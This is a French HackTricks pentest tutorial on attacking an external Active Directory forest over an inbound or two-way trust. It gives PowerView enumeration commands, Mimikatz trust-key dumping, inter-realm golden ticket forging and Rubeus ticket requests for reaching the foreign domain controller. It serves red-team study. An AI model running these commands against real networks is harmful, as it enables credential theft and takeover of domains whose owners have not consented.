# Domaine de forêt externe - OneWay (entrant) ou bidirectionnel {{#include ../../banners/hacktricks-training.md}} Dans ce scénario, un domaine externe vous fait confiance (ou les deux se font confiance), vous pouvez donc obtenir un certain type d'accès. ## Énumération Tout d'abord, vous devez **énumérer** la **confiance** : ```bash Get-DomainTrust SourceName : a.domain.local --> Current domain TargetName : domain.external --> Destination domain TrustType : WINDOWS-ACTIVE_DIRECTORY TrustAttributes : TrustDirection : Inbound --> Inboud trust WhenCreated : 2/19/2021 10:50:56 PM WhenChanged : 2/19/2021 10:50:56 PM # Get name of DC of the other domain Get-DomainComputer -Domain domain.external -Properties DNSHostName dnshostname ----------- dc.domain.external # Groups that contain users outside of its domain and return its members Get-DomainForeignGroupMember -Domain domain.external GroupDomain : domain.external GroupName : Administrators GroupDistinguishedName : CN=Administrators,CN=Builtin,DC=domain,DC=external MemberDomain : domain.external MemberName : S-1-5-21-3263068140-2042698922-2891547269-1133 MemberDistinguishedName : CN=S-1-5-21-3263068140-2042698922-2891547269-1133,CN=ForeignSecurityPrincipals,DC=domain, DC=external # Get name of the principal in the current domain member of the cross-domain group ConvertFrom-SID S-1-5-21-3263068140-2042698922-2891547269-1133 DEV\External Admins # Get members of the cros-domain group Get-DomainGroupMember -Identity "External Admins" | select MemberName MemberName ---------- crossuser # Lets list groups members ## Check how the "External Admins" is part of the Administrators group in that DC Get-NetLocalGroupMember -ComputerName dc.domain.external ComputerName : dc.domain.external GroupName : Administrators MemberName : SUB\External Admins SID : S-1-5-21-3263068140-2042698922-2891547269-1133 IsGroup : True IsDomain : True # You may also enumerate where foreign groups and/or users have been assigned # local admin access via Restricted Group by enumerating the GPOs in the foreign domain. ``` Dans l'énumération précédente, il a été trouvé que l'utilisateur **`crossuser`** est dans le groupe **`External Admins`** qui a **un accès Admin** à l'**AD du domaine externe**. ## Accès Initial Si vous **n'avez pas pu** trouver d'accès **spécial** de votre utilisateur dans l'autre domaine, vous pouvez toujours revenir à la méthodologie AD et essayer de **privesc depuis un utilisateur non privilégié** (des choses comme le kerberoasting par exemple) : Vous pouvez utiliser les **fonctions Powerview** pour **énumérer** l'**autre domaine** en utilisant le paramètre `-Domain` comme dans : ```bash Get-DomainUser -SPN -Domain domain_name.local | select SamAccountName ``` {{#ref}} ./ {{#endref}} ## Usurpation d'identité ### Connexion En utilisant une méthode régulière avec les identifiants des utilisateurs ayant accès au domaine externe, vous devriez être en mesure d'accéder à : ```bash Enter-PSSession -ComputerName dc.external_domain.local -Credential domain\administrator ``` ### Abus de l'historique SID Vous pouvez également abuser de [**l'historique SID**](sid-history-injection.md) à travers une confiance de forêt. Si un utilisateur est **migré d'une forêt à une autre** et que **le filtrage SID n'est pas activé**, il devient possible d'**ajouter un SID de l'autre forêt**, et ce **SID** sera **ajouté** au **jeton de l'utilisateur** lors de l'authentification **à travers la confiance**. > [!WARNING] > En rappel, vous pouvez obtenir la clé de signature avec > > ```bash > Invoke-Mimikatz -Command '"lsadump::trust /patch"' -ComputerName dc.domain.local > ``` Vous pourriez **signer avec** la clé **de confiance** un **TGT usurpant** l'utilisateur du domaine actuel. ```bash # Get a TGT for the cross-domain privileged user to the other domain Invoke-Mimikatz -Command '"kerberos::golden /user: /domain: /SID: /rc4: /target: /ticket:C:\path\save\ticket.kirbi"' # Use this inter-realm TGT to request a TGS in the target domain to access the CIFS service of the DC ## We are asking to access CIFS of the external DC because in the enumeration we show the group was part of the local administrators group Rubeus.exe asktgs /service:cifs/dc.doamin.external /domain:dc.domain.external /dc:dc.domain.external /ticket:C:\path\save\ticket.kirbi /nowrap # Now you have a TGS to access the CIFS service of the domain controller ``` ### Façon complète d'usurper l'utilisateur ```bash # Get a TGT of the user with cross-domain permissions Rubeus.exe asktgt /user:crossuser /domain:sub.domain.local /aes256:70a673fa756d60241bd74ca64498701dbb0ef9c5fa3a93fe4918910691647d80 /opsec /nowrap # Get a TGT from the current domain for the target domain for the user Rubeus.exe asktgs /service:krbtgt/domain.external /domain:sub.domain.local /dc:dc.sub.domain.local /ticket:doIFdD[...snip...]MuSU8= /nowrap # Use this inter-realm TGT to request a TGS in the target domain to access the CIFS service of the DC ## We are asking to access CIFS of the external DC because in the enumeration we show the group was part of the local administrators group Rubeus.exe asktgs /service:cifs/dc.doamin.external /domain:dc.domain.external /dc:dc.domain.external /ticket:doIFMT[...snip...]5BTA== /nowrap # Now you have a TGS to access the CIFS service of the domain controller ``` {{#include ../../banners/hacktricks-training.md}}